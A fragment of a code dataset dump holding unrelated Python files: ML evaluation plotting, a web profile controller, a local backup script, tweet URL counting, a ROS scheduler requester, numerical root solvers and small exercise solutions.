parser.add_argument('--resume_from', type=bool, required=False, help = \"whether retrain from a certain old model\")\n parser.add_argument('--old_dict', required='--resume_from' in sys.argv)\n parser.add_argument('--n_epochs', type=int, default=100, help='number of epochs with the initial learning rate')\n parser.add_argument('--n_epochs_decay', type=int, default=100, help='number of epochs to linearly decay learning rate to zero')\n parser.add_argument('--epoch_count', type=int, default=1, help='the starting epoch count, we save the model by , +, ...')\n parser.add_argument('--beta1', type=float, default=0.5, help='momentum term of adam')\n parser.add_argument(\"--lr\", type=float, default=1e-3, help=\"Learning rate\")\n parser.add_argument('--lr_policy', type=str, default='linear', help='learning rate policy. [linear | step | plateau | cosine]')\n parser.add_argument('--lr_decay_iters', type=int, default=50, help='multiply by a gamma every lr_decay_iters iterations')\n parser.add_argument('--loss', type=str, default='mse', help='loss function [mse | l1 | huber]')\n parser.add_argument('--delta', type=float, default=1, help='huber delta')\n\n # extraction model parameters\n parser.add_argument('--model_name', type=str, default='resnet34', help='chooses which model to use. 
[resnet18 | resnet34 | resnet50| resnet101 | resnet152]')\n parser.add_argument('--norm_type', type=str, default='batch', help='instance normalization or batch normalization [instance | batch | none]')\n\n # fc model parameters\n parser.add_argument('--fc_filters', type=int, default=512, help='# fc filters in the first layer')\n parser.add_argument('--fc_layers', type=int, default=3, help='# fc layers')\n parser.add_argument('--fc_norm_type', type=str, default='none', help='instance normalization or batch normalization [instance | batch | none]')\n parser.add_argument('--fc_drop_out', type = float, default = 0.2, help='dropout in the fc_layers')\n parser.add_argument('--fc_relu_slope', type = float, default = 0.01, help='relu slope in the fc_layers')\n\n #model init\n parser.add_argument('--init_type', type=str, default='normal', help='network initialization [normal | xavier | kaiming | orthogonal]')\n parser.add_argument('--init_gain', type=float, default=0.02, help='scaling factor for normal, xavier and orthogonal.')\n parser.add_argument('--checkpoints_dir', type=str, default='./checkpoints')\n # Parse and return arguments\n opt = parser.parse_known_args()[0]\n print(len(opt.dict_files))\n fig, axs = plt.subplots(len(opt.dict_files), 3, figsize=(12, 3*len(opt.dict_files)))\n ax = axs.ravel()\n\n for i, dict_file in enumerate(opt.dict_files):\n if dict_file.find('resnet_18') != -1:\n print('resnet_18')\n opt = parser.parse_args(['--model_name', 'resnet18'])\n opt = parser.parse_args(['--fc_filters', '512'])\n opt = parser.parse_args(['--fc_layers', '3'])\n\n elif dict_file.find('resnet_34') != -1:\n print('resnet_34s')\n opt = parser.parse_args(['--model_name', 'resnet34'])\n opt = parser.parse_args(['--fc_filters', '512'])\n opt = parser.parse_args(['--fc_layers', '3'])\n\n elif dict_file.find('resnet_50') != -1:\n print('resnet_50')\n opt = parser.parse_args(['--model_name', 'resnet50'])\n opt = parser.parse_args(['--fc_filters', '2048'])\n opt = parser.parse_args(['--fc_layers', '2'])\n\n elif dict_file.find('resnet_101') != -1:\n opt = parser.parse_args(['--model_name', 'resnet101'])\n elif dict_file.find('resnet_152') != -1:\n opt = parser.parse_args(['--model_name', 'resnet152'])\n\n if dict_file.find('bs16') != -1:\n opt = parser.parse_args(['--batch_size', '16'])\n elif dict_file.find('bs128') != -1:\n opt = parser.parse_args(['--batch_size', '128'])\n elif dict_file.find('bs8') != -1:\n opt = parser.parse_args(['--batch_size', '8'])\n\n if dict_file.find('instance') != -1:\n opt = parser.parse_args(['--norm_type', 'instance'])\n else:\n opt = parser.parse_args(['--norm_type', 'batch'])\n\n # creat discinminator\n model = define_model(opt, device_list)\n model.load_state_dict(torch.load(dict_file + \".pt\"))\n\n img_trans = torch.nn.Sequential(\n transforms.RandomHorizontalFlip(p=0.5),\n transforms.RandomRotation(45, interpolation=transforms.InterpolationMode.NEAREST, expand=False, center=None, fill=0, resample=None),\n transforms.RandomVerticalFlip(p=0.5),)\n scripted_transforms = torch.jit.script(img_trans)\n\n if opt.std_transform == True:\n img_trans_i = torch.nn.Sequential( transforms.Normalize(mean=[0.5], std=[0.2]),\n )\n scripted_transforms_i = torch.jit.script(img_trans_i)\n else:\n scripted_transforms_i = None\n\n data_prepared = split_data('Data_mask_ponly_r7.npy', opt.batch_size, opt.phase_norm, opt.ros_norm, train_phase= opt.phase, trans=scripted_transforms, trans_i =scripted_transforms_i)\n data_prepared_1 = split_data('Data_mask_test_r7.npy', opt.batch_size, 
opt.phase_norm, opt.ros_norm, train_phase= 'test', trans=scripted_transforms, trans_i =scripted_transforms_i)\n test_loader = data_prepared['data_loader_test']\n train_loader = data_prepared['data_loader_train']\n test_loader_1 = data_prepared_1['data_loader_test']\n\n loader_list = [train_loader, test_loader, test_loader_1]\n for j in range(3): \n loss_te, loss_c, X_te, y_te, y_tep, class_label, condition_tag = test_rg(model, loader_list[j], opt)\n mae = np.mean(np.abs(y_te - y_tep))\n mape = np.mean(np.abs(y_te - y_tep)/y_te)\n ax[i*3+j].scatter(y_te, y_tep, s=0.1)\n ax[i*3+j].plot(np.linspace(0, 5, 30), np.linspace(0, 5, 30), c= \"red\", linestyle=':')\n ax[i*3+j].set_xlim([1, 3.5])\n ax[i*3+j].set_ylim([1, 3.5])\n # plt.title('Test-PMA')\n ax[i*3+j].set_xlabel('Ground truth', fontsize=14)\n #plt.ylim((0, 6000))\n ax[i*3+j].set_ylabel('Predition', fontsize=14)\n # plt.legend(handles = legend_vec)\n ax[i*3+j].grid(which='both', axis='y', alpha=0.4)\n ax[i*3+j].text(1.1, 2.8, 'MAE: %.4f\\nMAPE:%.2f%% \\nMSE: %.4f'%(mae, mape*100, loss_te), fontsize = 14)\n plt.show()","sub_path":"code/test_on_dict_list.py","file_name":"test_on_dict_list.py","file_ext":"py","file_size_in_byte":8332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"523885737","text":"# -*- coding: utf-8 -*-\n\"\"\"Profile controller module\"\"\"\n\nfrom tg import predicates, require\nfrom tg import expose, redirect, validate, flash, url, request\n\nfrom tg.i18n import ugettext as _\nfrom tg.i18n import lazy_ugettext as l_\n\nfrom rocket.model import *\n\nfrom sqlalchemy import func, desc, asc\n\nfrom rocket.lib.tg_utils import *\nfrom rocket.lib.base import BaseController\n\nLIMIT = 20\n\nclass ProfileController(BaseController):\n\n def __init__(self, *args, **kwargs):\n pass\n\n @require(predicates.not_anonymous())\n @expose('rocket.templates.generic')\n def index(self, *args, **kwargs):\n html = self.get_active_profile_html(*args, **kwargs)\n javascript = self.get_javascript_profile_onload()\n title = _(\"My Profile\")\n return dict(title=title, html=html, javascript=javascript)\n\n @expose()\n def get_active_profile_html(self, *args, **kwargs):\n html = f\"\"\"\n
            <!-- the original HTML for this template was lost during extraction; only the heading text below survived -->\n            {_('My Profile')}
\n        \"\"\"\n        return html\n\n    @expose()\n    def get_javascript_profile_onload(self, *args, **kwargs):\n        javascript = \"\"\"\n        // script body lost during extraction\n        \"\"\"\n        return javascript\n","sub_path":"rocket2_2/rocket/controllers/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":1594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"249324117","text":"import re\nfrom get_content import getContent\nfrom writer import writeImpl, writeInputFile\n\ndirName = '2016'\nyear = dirName\n\ndeclarationTemplate = getContent(\"v2/declare.txt\")\nimplementationTemplate = getContent(\"v2/source.txt\")\n\nfor i in range(21, 26):\n    writeImpl(dirName, str(i), implementationTemplate, year)\n    writeInputFile(dirName, str(i))\n    print(declarationTemplate.replace(\"DAY\", str(i)).replace(\"YEAR\", year))\n","sub_path":"cpp/generator/twentyfive_append.py","file_name":"twentyfive_append.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"381297514","text":"#!/usr/bin/env python3\n\"Full and incremental backups driven by md5 snapshots\"\n\nimport time\nimport tarfile\nimport os\nimport hashlib\nimport pickle\n\n\ndef chmd5(file):\n    m = hashlib.md5()\n    with open(file, 'rb') as fobj:\n        while True:\n            data = fobj.read(4096)\n            if not data:\n                break\n            m.update(data)\n    return m.hexdigest()\n\ndef total_bak(src,dst,md5file):\n    fname = '%s_full_%s.tar.gz'%(os.path.basename(src),time.strftime('%Y%m%d'))\n    fname = os.path.join(dst,fname)\n\n    t=tarfile.open(fname,'w:gz')\n    t.add(src)\n    t.close()\n\n    fileList={}\n\n    for path,folders,files in os.walk(src):\n        for file in files:\n            file=os.path.join(path,file)\n            fileList[file]=chmd5(file)\n\n    with open(md5file,'wb') as fobj:\n        pickle.dump(fileList,fobj)\n\n\ndef incr_bak(src,dst,md5file):\n    fname = '%s_incr_%s.tar.gz' % (os.path.basename(src), time.strftime('%Y%m%d'))\n    fname = os.path.join(dst, fname)\n    newList={}\n    for path,folders,files in os.walk(src):\n        for file in files:\n            file=os.path.join(path,file)\n            newList[file]=chmd5(file)\n    with open(md5file,'rb') as fobj:\n        oldList=pickle.load(fobj)\n\n    tar = tarfile.open(fname,'w:gz')\n    for key in newList:\n        if key not in oldList or newList[key] != oldList[key]:  # new or changed files; indexing oldList directly raised KeyError for new files\n            tar.add(key)\n    tar.close()\n\n    with open(md5file,'wb') as fobj:\n        pickle.dump(newList,fobj)\n\n\ndef manual():\n    src='/tmp/demo/security'\n    dst='/tmp/demo/backup'\n    md5file='/tmp/demo/backup/md5.data'\n\n    if time.strftime('%a') == 'Mon':  # full backup on Mondays, incremental the rest of the week (the original test was inverted)\n        total_bak(src,dst,md5file)\n    else:\n        incr_bak(src,dst,md5file)\n\n\nif __name__ == '__main__':\n    manual()\n    # with open('/tmp/demo/backup/md5.data','rb') as fobj:\n    #     data=pickle.load(fobj)\n    #     print(data)\n","sub_path":"ktz/py02/d3bak.py","file_name":"d3bak.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"514127176","text":"from urllib.parse import urlparse\nfrom fundamentals_of_data_science.case_1.src.main import small_col, full_col\nfrom fundamentals_of_data_science.case_1.src.utils import get_frequency_table\n\n\ndef get_urls_set(collection, case_sensitive=True):\n    # return unique user mentions (screen names)\n    mentions = collection.distinct('entities.user_mentions.screen_name')  # renamed from 'urls': the original returned an undefined name 'mentions'\n    return mentions if case_sensitive else list(set([m.lower() for m in mentions]))\n\n\ndef get_extended_urls(collection):\n    # return the expanded urls found in the tweets\n    urls = []\n    tweets = collection.find()\n    for idx, tw in enumerate(tweets):\n        # filter out 
twitter status\n if idx % 100 == 0:\n print(idx)\n for url in tw['entities']['urls']:\n if not('https://twitter.com' in url['expanded_url']):\n urls.append(url['expanded_url'])\n return urls\n\n\ndef get_domains(extended_urls):\n return [urlparse(u).netloc for u in extended_urls]\n\n\nif __name__ == \"__main__\":\n urls = get_extended_urls(full_col)\n urls_ft = get_frequency_table(urls)\n urls_ft.to_csv(path=\"urls_count.csv\")\n\n if False:\n domains = get_domains(urls)\n domains_ft = get_frequency_table(domains)\n domains_ft.to_csv(path=\"domain_count.csv\")\n print(domains_ft)\n","sub_path":"fundamentals_of_data_science/case_1/src/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"89816802","text":"# Software License Agreement (BSD License)\n#\n# Copyright (C) 2013, Jack O'Quin\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n# * Neither the name of the author nor of other contributors may be\n# used to endorse or promote products derived from this software\n# without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\n# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN\n# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\"\n.. module:: requester\n\nPython interface for ROCON services making scheduler requests.\n\nThis module provides a relatively simple API, not requiring detailed\nknowledge of scheduler request messages or state transitions.\n\n.. _`uuid_msgs/UniqueID`:\n http://ros.org/doc/api/uuid_msgs/html/msg/UniqueID.html\n.. _UUID: http://en.wikipedia.org/wiki/Uuid\n\n\"\"\"\n\n# enable some python3 compatibility options:\nfrom __future__ import absolute_import, print_function, unicode_literals\n\nimport copy\n\n# ROS dependencies\nimport rospy\nimport unique_id\n\n# ROS messages\nfrom scheduler_msgs.msg import Request\nfrom scheduler_msgs.msg import SchedulerRequests\n\n# internal modules\nfrom . import common\nfrom .transitions import RequestSet\nfrom .transitions import ResourceRequest\nfrom .transitions import WrongRequestError\n\n\nclass Requester(object):\n \"\"\"\n This class is used by a ROCON service to handle its resource\n requests. 
When an instance of :class:`.Requester` is created, it\n creates its own scheduler feedback topic and connects to the ROCON\n scheduler topic.\n\n :param feedback: Callback function invoked with the current\n :class:`.RequestSet` when feedback arrives.\n\n :param uuid: UUID_ of this requester. If ``None`` provided, a random\n UUID will be assigned.\n :type uuid: :class:`uuid.UUID`\n\n :param priority: default priority for requests from this requester.\n\n :param topic: Topic name for allocating resources.\n :type topic: str\n\n :param frequency: requester heartbeat frequency in Hz. Use the\n default, except in exceptional situations or for\n testing.\n :type frequency: float\n\n As long as the :class:`.Requester` object remains, it will\n periodically send request messages to the scheduler, even when no\n requests are outstanding. The scheduler will provide feedback for\n them if anything has changed. The caller-provided *feedback*\n function will be invoked each time a feedback message arrives,\n like this:\n\n .. describe:: feedback(rset)\n\n :param rset: The current set of requests including any updates\n from the scheduler.\n :type rset: :class:`.RequestSet`\n\n The *feedback* function is expected to iterate over its\n :class:`.RequestSet`, checking the status of every\n :class:`.ResourceRequest` it contains, and modify them\n appropriately. If any changes occur, the scheduler will be\n notified after this callback returns.\n\n \"\"\"\n\n def __init__(self, feedback, uuid=None,\n priority=0,\n topic=common.SCHEDULER_TOPIC,\n frequency=common.HEARTBEAT_HZ):\n \"\"\" Constructor. \"\"\"\n\n if uuid is None:\n uuid = unique_id.fromRandom()\n self.requester_id = uuid\n \"\"\" :class:`uuid.UUID` of this requester. \"\"\"\n self.rset = RequestSet([], self.requester_id)\n \"\"\"\n :class:`.RequestSet` containing the current status of every\n :class:`.ResourceRequest` made by this requester. All\n requester operations are done using this object and its\n contents.\n \"\"\"\n self.priority = priority\n \"\"\" Default for new requests' priorities if none specified. \"\"\"\n\n self.feedback = feedback # requester feedback\n self.pub_topic = topic\n self.sub_topic = common.feedback_topic(uuid, topic)\n rospy.loginfo('ROCON requester feedback topic: ' + self.sub_topic)\n self.sub = rospy.Subscriber(self.sub_topic,\n SchedulerRequests,\n self._feedback)\n self.pub = rospy.Publisher(self.pub_topic,\n SchedulerRequests,\n latch=True)\n self.time_delay = rospy.Duration(1.0 / frequency)\n self._set_timer()\n\n def _feedback(self, msg):\n \"\"\" Scheduler feedback message handler. \"\"\"\n new_rset = RequestSet(msg.requests, self.requester_id)\n prev_rset = copy.deepcopy(self.rset)\n self.rset.merge(new_rset)\n\n # invoke user-defined callback function\n self.feedback(self.rset)\n\n if self.rset != prev_rset: # msg or callback changed something?\n self.send_requests() # send new request immediately\n\n def _heartbeat(self, event):\n \"\"\" Scheduler request heartbeat timer handler.\n\n Triggered after nothing has been sent to the scheduler within\n the previous time_delay duration. 
Sends another copy of the\n current request set to the scheduler.\n\n \"\"\"\n self.send_requests()\n\n def new_request(self, resources, priority=None, uuid=None):\n \"\"\" Add a new scheduler request.\n\n Call this method for each desired new request, then invoke\n :py:meth:`.send_requests` to notify the scheduler.\n\n :param resources: ROCON resources requested\n :type resources: list of scheduler_msgs/Resource\n\n :param priority: Scheduling priority of this request. If\n ``None`` provided, use this requester's priority.\n :type priority: int\n\n :param uuid: UUID_ of this request. If ``None`` provided, a\n random UUID will be assigned.\n :type uuid: :class:`uuid.UUID` or ``None``\n\n :returns: UUID (:class:`uuid.UUID`) assigned.\n :raises: :exc:`.WrongRequestError` if request already exists.\n \"\"\"\n if priority is None:\n priority = self.priority\n if uuid is None:\n uuid = unique_id.fromRandom()\n if uuid in self.rset:\n raise WrongRequestError('UUID already in use.')\n msg = Request(id=unique_id.toMsg(uuid),\n priority=priority,\n resources=resources,\n status=Request.NEW)\n self.rset[uuid] = ResourceRequest(msg)\n return uuid\n\n def send_requests(self):\n \"\"\" Send all current requests to the scheduler.\n\n Use this method after calling :py:meth:`.new_request` one or\n more times. It will send them to the scheduler immediately.\n Otherwise, they would not go out until the next heartbeat\n timer event.\n\n .. note::\n\n A recent heartbeat may already have sent some recent\n requests. This method just ensures they are all sent\n without further delay.\n\n \"\"\"\n #print(str(self.rset))\n self.pub.publish(self.rset.to_msg())\n #self._set_timer() # reset heartbeat timer\n\n def _set_timer(self):\n \"\"\" Schedule heartbeat timer callback. 
\"\"\"\n if not rospy.is_shutdown():\n #self.timer.shutdown()\n #self.timer = rospy.Timer(self.time_delay,\n # self._heartbeat,\n # oneshot=True)\n self.timer = rospy.Timer(self.time_delay, self._heartbeat)\n","sub_path":"src/rocon_scheduler_requests/requester.py","file_name":"requester.py","file_ext":"py","file_size_in_byte":8535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"239830996","text":"from math import sqrt, log10, pi, ceil, floor\n\ntolerance = 0.0001\n\nh_loss_ideal = 0.08\ndensity = 0.075\nviscosity = 0.0432\nst_length = 100\nroughness = 0.006\ncolebrook_correct = 0.00065\n\n\ndef secant_solver(guess, guess2, func_eval):\n x0 = guess\n x1 = guess2\n steps = 0\n\n for j in range(1, 100):\n if abs(x1 - x0) < tolerance:\n x1 = x1\n print(\"Secant Steps taken: \" + str(steps))\n print(\"Secant Friction Factor: \" + str(x1 + .00065))\n return x1, steps\n\n elif j == 99:\n print(\"Solver Malfunction\")\n return 0\n\n else:\n x2 = x1 - func_eval(x1) * (x1 - x0) / (func_eval(x1) - func_eval(x0))\n x0 = abs(x1)\n x1 = abs(x2)\n steps += 1\n # print(\"x1 is: \" + str(x1))\n # print(\"x0 is: \" + str(x0))\n\n\ndef brents(x0, x1, f):\n fx0 = f(x0)\n fx1 = f(x1)\n max_iter = 50\n\n assert (fx0 * fx1) <= 0, \"Root not bracketed\"\n\n if abs(fx0) < abs(fx1):\n x0, x1 = x1, x0\n fx0, fx1 = fx1, fx0\n\n x2, fx2 = x0, fx0\n\n mflag = True\n steps_taken = 0\n\n while steps_taken < max_iter and abs(x1 - x0) > tolerance:\n fx0 = f(x0)\n fx1 = f(x1)\n fx2 = f(x2)\n\n if fx0 != fx2 and fx1 != fx2:\n L0 = (x0 * fx1 * fx2) / ((fx0 - fx1) * (fx0 - fx2))\n L1 = (x1 * fx0 * fx2) / ((fx1 - fx0) * (fx1 - fx2))\n L2 = (x2 * fx1 * fx0) / ((fx2 - fx0) * (fx2 - fx1))\n new = L0 + L1 + L2\n\n else:\n new = x1 - ((fx1 * (x1 - x0)) / (fx1 - fx0))\n\n if ((new < ((3 * x0 + x1) / 4) or new > x1) or\n (mflag == True and (abs(new - x1)) >= (abs(x1 - x2) / 2)) or\n (mflag == False and (abs(new - x1)) >= (abs(x2 - d) / 2)) or\n (mflag == True and (abs(x1 - x2)) < tolerance) or\n (mflag == False and (abs(x2 - d)) < tolerance)):\n new = (x0 + x1) / 2\n mflag = True\n\n else:\n mflag = False\n\n fnew = f(new)\n d, x2 = x2, x1\n\n if (fx0 * fnew) < 0:\n x1 = new\n else:\n x0 = new\n\n if abs(fx0) < abs(fx1):\n x0, x1 = x1, x0\n\n steps_taken += 1\n print(\"Brent other Steps taken: \" + str(steps_taken))\n print(\"Brent other Friction Factor: \" + str(x1 + .00065))\n return x1, steps_taken\n\n\ndef brent_solver(a, b, func):\n # if func(a) * func(b) >= 0:\n # return 0, 0\n\n if abs(func(a)) < abs(func(b)):\n a, b = b, a\n c = a\n mflag = True\n steps = 0\n\n while steps < 100 and abs(b - a) > tolerance:\n if func(a) != func(c) and func(b) != func(c):\n s1 = (a * func(b) * func(c)) / ((func(a) - func(b)) * (func(a) - func(c)))\n s2 = (b * func(a) * func(c)) / ((func(b) - func(a)) * (func(b) - func(c)))\n s3 = (c * func(a) * func(b)) / ((func(c) - func(a)) * (func(c) - func(b)))\n s = s1 + s2 + s3\n\n else:\n s = b - func(b) * (b - a) / (func(b) - func(a))\n\n if s < (3 * a + b) / 4 or s > b:\n s = (a + b) / 2\n mflag = True\n elif mflag is True and abs(s - b) >= (abs(b - c) / 2):\n s = (a + b) / 2\n mflag = True\n elif mflag is False and abs(s - b) >= (abs(c - d) / 2):\n s = (a + b) / 2\n mflag = True\n elif mflag is True and abs(b - c) < abs(tolerance):\n s = (a + b) / 2\n mflag = True\n elif mflag is False and abs(c - d) < abs(tolerance):\n s = (a + b) / 2\n mflag = True\n else:\n mflag = False\n\n d = c\n c = b\n if func(a) * func(s) < 0:\n b = s\n else:\n a = s\n\n 
if abs(func(a)) < abs(func(b)):\n a, b = b, a\n\n steps += 1\n print(\"Brent mine Steps taken: \" + str(steps))\n print(\"Brent mine Friction Factor: \" + str(b + .00065))\n return b, steps\n\n\ndef h_loss_func(cfm, dim1, dim2, f):\n eq_dia = 1.3 * pow((dim1 * dim2), 0.625) / pow((dim1 + dim2), 0.25)\n\n eq_area = pi * pow(eq_dia, 2) / 4 / 144\n # print(str(eq_area))\n fpm = cfm / eq_area\n fps = fpm / 60\n\n re = density * fpm * 60 * eq_dia / 12 / viscosity\n\n def colebrook_eq(var):\n lhs = 1 / sqrt(var)\n rhs = -2 * log10((roughness / (3.7 * eq_dia)) + (2.51 / (re * sqrt(var))))\n # print(str(eq_dia))\n return lhs - rhs\n\n h_loss = (f(0.01, 0.04, colebrook_eq)[0] + 0.00065) * (st_length / (eq_dia / 12)) * (\n density / 32.174) * (\n pow(fps, 2) / 2) / 144 * 27.679904842545\n return round(h_loss, 4)\n\n\ndef dim2_func(cfm_seg, limit_inch):\n def dim2_eq(var):\n return h_loss_func(cfm_seg, limit_inch, var) - h_loss_ideal\n\n dim_work, steps = brent_solver(2, 98, dim2_eq)\n print(str(dim_work))\n print(str(steps))\n return dim_work\n\n\n# def func(x):\n# return x-4\n\n\nf = lambda x: x ** 2 - 4\ncfm = int(input(\"CFM: \"))\nwidth = int(input(\"Width: \"))\nheight = int(input(\"Height: \"))\n\n\n# root_brent_other = []\n# root_brent_mine = []\n# root_secant = []\n\n\ndef range_create(n):\n return list(range(100, n + 100))\n\n\ndef numbers(n):\n return [i for i in range(100, n, 100)]\n\n\n# print(numbers(10000))\n\n# cfm = list(range(100, 10000, 100))\n\n\"\"\"for i in range(1, len(cfm)):\n width = 18\n height = 12\n\n root_brent_other.append(h_loss_func(cfm[i], width, height, brents))\n\n root_brent_mine.append(h_loss_func(cfm[i], width, height, brent_solver))\n\n root_secant.append(h_loss_func(cfm[i], width, height, secant_solver))\n # root, steps = brents(func, -10, 10)\n # print(str(brents(f, -10, 10)))\n\nprint(\"Brent other Root is: \" + str(root_brent_other))\nprint(\"Brent mine Root is: \" + str(root_brent_mine))\nprint(\"Secant Root is: \" + str(root_secant))\n# print(\"Steps taken: \" + str(steps))\"\"\"\n\nroot_brent_other = h_loss_func(cfm, width, height, brents)\n\nroot_brent_mine = h_loss_func(cfm, width, height, brent_solver)\n\nroot_secant = h_loss_func(cfm, width, height, secant_solver)\n\nprint(\"Brent other Root is: \" + str(root_brent_other))\nprint(\"Brent mine Root is: \" + str(root_brent_mine))\nprint(\"Secant Root is: \" + str(root_secant))\n","sub_path":"solver_testing.py","file_name":"solver_testing.py","file_ext":"py","file_size_in_byte":6191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"279546377","text":"from matplotlib import pyplot as plt\nimport numpy as np\nimport math\n\na1 = np.array([1, 2, 3])\nc = np.array([3, 4, 5])\nX1, Y1, Z1 = a1\nX2, Y2, Z2 = c\nplt.title('show data')\nplt.scatter(X1, Y1, Z1, color=\"blue\", label=\"a1\")\nplt.scatter(X2, Y2, Z2, color=\"red\", label=\"a2\")\ndef Mahalanobis(vec1, vec2):\n npvec1, npvec2 = np.array(vec1), np.array(vec2)\n npvec = np.array([npvec1, npvec2])\n sub = npvec.T[0]-npvec.T[1]\n inv_sub = np.linalg.inv(np.cov(npvec1, npvec2))\n return math.sqrt(np.dot(inv_sub, sub).dot(sub.T))\ndef show_distance(exit_point, c):\n line_point = np.array([exit_point, c])\n x = (line_point.T)[0]\n y = (line_point.T)[1]\n o_dis = round(Mahalanobis(exit_point, c), 2) # 计算距离,更改函数名称\n mi_x, mi_y = (exit_point+c)/2 # 计算中点位置,来显示“distance=xx”这个标签\n plt.annotate('distance=%s' % str(o_dis), xy=(mi_x, mi_y), xycoords='data', xytext=(+10, 0), textcoords='offset points', 
fontsize=10, arrowprops=dict(arrowstyle=\"-\", connectionstyle=\"arc3,rad=.2\"))\n return plt.plot(x, y, linestyle=\"--\", color='black', lw=1)\nshow_distance(a1, c)\nplt.show()","sub_path":"Test1.py","file_name":"Test1.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"397042046","text":"#!/bin/python\n\nimport sys\n\n\"\"\"INITIAL TRY\ndef getMoneySpent(keyboards, drives, s):\n # Complete this function\n if min(keyboards) > s or min(drives) > s:\n return -1\n total_list = []\n for x in range(0, len(keyboards)):\n for y in range(0, len(drives)):\n price = keyboards[x] + drives[y]\n if price == s:\n # No better combination than spending all the money\n return s\n else:\n total_list.append(price)\n \n if len(total_list) == 0:\n return -1\n else:\n max_price = -1\n for val in total_list:\n if val < s and val > max_price:\n max_price = val\n return max_price\n\"\"\"\n\n# Reading the discussion a better way would be to sort the keyboards in descencing \n# and drives in ascending. Doing that allows us to optimize the for loop and break since we know\n# Values below a certain point cannot be considered. Still brute forced but better optimized\n\ndef getMoneySpent(keyboards, drives, s):\n if min(keyboards) > s or min(drives) > s:\n return -1\n keyboards.sort(reverse=True)\n drives.sort()\n\n total_list = []\n working_max = -1\n\n for k in keyboards:\n for l in drives:\n price = k + l\n if price == s:\n return s\n elif price > s:\n break\n else:\n if price > working_max:\n working_max = price\n return working_max\n\ns,n,m = raw_input().strip().split(' ')\ns,n,m = [int(s),int(n),int(m)]\nkeyboards = map(int, raw_input().strip().split(' '))\ndrives = map(int, raw_input().strip().split(' '))\n# The maximum amount of money she can spend on a keyboard and USB drive, or -1 if she can't purchase both items\nmoneySpent = getMoneySpent(keyboards, drives, s)\nprint(moneySpent)\n","sub_path":"src/python/electronics-shop.py","file_name":"electronics-shop.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"342402822","text":"# A1.3g Kernel Regression\r\ndef kernel(xi,xj, sigma = 0.15):\r\n # this function calculates the kernel of the two x-values xi and xj\r\n return np.exp(-1/(sigma**2)*abs(xi-xj)**2)\r\n\r\n\r\ndef kernel_regression(x_train):\r\n # this function calculates the K-matrix for the kernel regression\r\n n = np.size(x_train)\r\n K = np.zeros((n, n))\r\n for i in xrange(n):\r\n for j in xrange(n):\r\n K[i, j] = kernel(x_train[i], x_train[j])\r\n return K\r\n\r\n\r\ndef kernel_predict(x, X, Y, K):\r\n # this function uses the K-matrix to predict new values\r\n f_x = np.zeros((np.size(x), 1))\r\n for i in xrange(np.size(x)):\r\n k = kernel(x[i],X)\r\n f_x[i,0] = np.dot(np.dot(k.T, inv(K)),Y)\r\n return f_x\r\n\r\n\r\nK = kernel_regression(x_train)\r\n# calculate the predicted values for the training data\r\ny_pred_kernel = kernel_predict(x_plot, x_train, y_train, K)\r\n# calculate the predicted values for the validation data\r\ny_kernel_pred_val = kernel_predict(x_val, x_train, y_train, K)\r\n# calculate the RMSE\r\nkernel_rmse = calc_rmse(Y_val, y_kernel_pred_val)\r\n","sub_path":"h1/solution/src/a13g.py","file_name":"a13g.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"192548574","text":"import 
